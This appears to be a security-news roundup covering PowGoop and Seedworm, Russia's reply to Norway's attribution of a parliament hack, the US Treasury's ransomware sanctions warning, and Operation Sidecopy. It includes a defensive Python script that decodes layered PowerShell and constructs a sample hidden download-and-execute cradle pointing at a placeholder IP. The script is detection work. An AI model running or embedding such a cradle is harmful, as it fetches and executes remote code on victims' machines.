"Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East," Symantec researchers stated in their analysis.  
"While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm's part. Any organizations that do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation." 

"There is nothing sophisticated about PowGoop aside from it being custom-made and that it uses multiple layers of encoded PowerShell scripts to effectively download and execute PS-based payloads," Thakur added later.

PowGoop has also been identified by several other companies. Security firm Palo Alto Networks linked PowGoop to two ransomware attacks on companies in the Middle East and North Africa at the beginning of September.
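Thakur's description of PowGoop, "multiple layers of encoded PowerShell scripts" that download and run further PowerShell, is the generic shape of an encoded download cradle, and the first triage step for any such sample is to peel the layers until readable code appears. The script below is an added example for this post; it is not Symantec's code and it does not reproduce PowGoop's actual encoding, which the article does not describe. It decodes a `-EncodedCommand` argument (base64 over UTF-16LE, accepted under any unambiguous prefix such as `-e` or `-enc`), keeps decoding `FromBase64String()` blobs found in each decoded layer, and reports common download-and-execute indicators. The two-layer sample command line is constructed in the block and points at a TEST-NET address, not a real host.

```python
"""Peel nested encoded PowerShell and report what the final layer does.

Added example for the PowGoop discussion; not Symantec's code and not the
real PowGoop format. The sample command line is constructed here.
"""
import base64
import binascii
import re

# powershell.exe accepts -e, -ec, -enc, ... -EncodedCommand; the value is
# base64 over UTF-16LE text.
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
FROM_B64 = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

INDICATORS = [
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download-cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("nested-base64", re.compile(r"FromBase64String", re.I)),
]


def b64_to_text(blob: str) -> str:
    """Decode base64, choosing UTF-16LE when every other byte is NUL."""
    raw = base64.b64decode(blob, validate=True)
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel(command_line: str, max_depth: int = 8) -> list:
    """Return [original, layer1, layer2, ...] until no encoded blob remains."""
    layers = [command_line]
    current = command_line
    for _ in range(max_depth):          # bounded: a malicious sample could nest forever
        match = ENC_FLAG.search(current) or FROM_B64.search(current)
        if not match:
            break
        try:
            current = b64_to_text(match.group(1))
        except (binascii.Error, ValueError):
            break                       # not really base64; stop at this layer
        layers.append(current)
    return layers


def analyze(command_line: str) -> dict:
    """Decode all layers and list which indicators appear in any of them."""
    layers = peel(command_line)
    joined = "\n".join(layers)
    hits = sorted(name for name, rx in INDICATORS if rx.search(joined))
    return {"layers": len(layers) - 1, "final": layers[-1], "indicators": hits}


def build_sample() -> str:
    """Constructed two-layer sample shaped like an encoded download cradle.
    The URL uses a TEST-NET-3 address and is not a real server."""
    inner = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"
    inner_b64 = base64.b64encode(inner.encode("utf-16-le")).decode()
    middle = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
              + inner_b64 + "'));IEX $s")
    middle_b64 = base64.b64encode(middle.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + middle_b64


if __name__ == "__main__":
    report = analyze(build_sample())
    print("decoded layers:", report["layers"])
    print("final layer:", report["final"])
    print("indicators:", ", ".join(report["indicators"]))
```

Run against process-creation logs (Sysmon event 1 or Windows 4688 with command-line auditing), the `layers` count alone is a useful signal: legitimate administrative PowerShell rarely needs more than one layer of encoding, and a cradle that only becomes readable after two or three decodes is exactly the "nothing sophisticated, just layered" pattern Thakur describes.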

Russia considers the accusations by the Norwegian authorities of the cyber attack as a provocation

Russia regards the Norwegian authorities' accusation that it was behind a cyber attack as a deliberate provocation, the Russian Embassy in Norway said in a statement on Facebook on Tuesday.

"We regard the incident as a serious deliberate provocation that is detrimental to bilateral relations,” said the statement.

"Millions of cyber attacks are made annually on Russian state Internet resources (including foreign institutions in Norway) from abroad (for example, 77 million attacks were made on the Foreign Ministry website in January-September 2018), but this does not give the right to accuse the authorities of the countries of their possible origin,” stressed the Embassy.

They pointed out that "in May 2020, a note was sent to the Norwegian Foreign Ministry setting out the procedure for dealing with computer incidents - there are official channels for investigating them." "There was no reaction at the time, which indicates the reluctance of the Norwegian authorities to conduct a dialogue. The question is why did we create specialized response mechanisms and create a legislative framework together with European countries? We expect explanations from the Norwegian side,” said the diplomatic mission.

Konstantin Kosachev, head of the Federation Council's International Affairs Committee, called the Norwegian government's accusations unsubstantiated. According to him, Oslo did not offer to discuss the incident at the expert level.

Earlier on Tuesday, Norwegian Foreign Minister Ine Eriksen Soreide said that Russia was behind the August 2020 cyber attack on the country's Parliament.

On September 1, the Parliament reported that it had been the target of a cyber attack in which unknown hackers gained access to the email accounts of a number of deputies and employees of the legislature. The Norwegian Police Security Service (PST) later said it would investigate whether "any state" was behind the attack, which took place on August 24.

U.S. Treasury Department Warns That Paying to End Cyberattacks Risks Running Afoul of Sanctions Rules

 

The U.S. Treasury Department has warned cyber insurers and other financial institutions that facilitating payments to hackers to end cyberattacks risks running afoul of sanctions rules.

The warnings, which concern the malicious programs known as ransomware, came from Treasury's Office of Foreign Assets Control (OFAC) and Financial Crimes Enforcement Network (FinCEN).

They add to the worries of cyber insurers, who have been raising rates and trying to limit their exposure to vulnerable customers in the face of a recent surge of costly ransomware claims.

Hackers have used ransomware to take down systems that control everything from hospital billing to manufacturing, stopping only after receiving hefty payments, typically made in cryptocurrency.

Ransomware payment demands have risen sharply during the pandemic as people work remotely and hackers target online systems.

The average ransomware payment jumped 60% to $178,254 between the first and second quarters, according to Coveware, a firm that negotiates cyber ransom payoffs. Cyber policies frequently cover such ransoms, data recovery, legal liabilities, and negotiators fluent in the hackers' languages.

Sumon Dantiki, a King and Spalding LLC lawyer who advises on national security and cyber matters, says that sophisticated insurers and financial institutions are already mindful of the sanctions concern. "Will victims who are insured still decide to make the payments?" Dantiki said. "This type of public advisory could affect the calculus there."

A companion FinCEN advisory also highlighted a growing industry of forensic firms that help organizations respond to cyberattacks, including by handling the payments.

OFAC cited cyberattacks dating back to 2015 that were traced to hackers in sanctioned nations such as North Korea and Russia.

Nonetheless, while the US can clearly impose economic and trade sanctions on nations that support terrorism or disregard human rights, it is the financial institutions, or the individuals, that deal with those parties who may ultimately face prosecution and penalties.


A Hacker Collective Based in Pakistan, Being Backed by China to Gather Intelligence Against India

 

In a coordinated attempt to steal strategic data and compromise critical infrastructure through phishing emails, a campaign has been launched by Transparent Tribe, a Pakistan-backed hacker group.

The campaign, dubbed "Operation Sidecopy", uses remote access malware that can escalate its privileges on compromised systems and, having infiltrated a computer, steal data from it.

Security researchers at Seqrite, the cybersecurity solutions arm of Quick Heal, believe that the main tools used in Operation Sidecopy point to Transparent Tribe, which Seqrite believes is backed by China to gather intelligence against India.

One of the main characteristics Seqrite associates with Pakistan's Transparent Tribe is the remote-server hosting the collective uses.

According to researchers Kalpesh Mantri, Pawan Chaudhari and Goutam Tripathy at Seqrite, Operation Sidecopy uses Contabo GmbH to host the remote server through which the malware is controlled and the flow of stolen data is managed, something Transparent Tribe is reported to have done before.

Himanshu Dubey, director of Quick Heal Security Labs, confirmed that the Operation Sidecopy cyberattacks are highly targeted at India and have been observed continuously since 2019.

"Till now, this attack has been only seen targeting India. The Tactics, Techniques and Procedures (TTPs), as well as decoy documents that we analysed, were crafted specifically in the Indian context," he says.

Clarifying the Pakistan and China connection in the series of cyber attacks, Quick Heal's Dubey says, "We have considered several factors such as infrastructure used for command servers, registered domain naming patterns and recently created domains, command and control server names that are similar to the names used by APT36 in the past, and APT36's history of attacks targeting Indian defence organisations. Also, one domain that hosted HTML stager applications is registered to a user in Rawalpindi, Pakistan."

Dubey says that all of Seqrite's findings on Operation Sidecopy have been shared with Indian government authorities to help them take appropriate protective steps and prevent the loss of important data.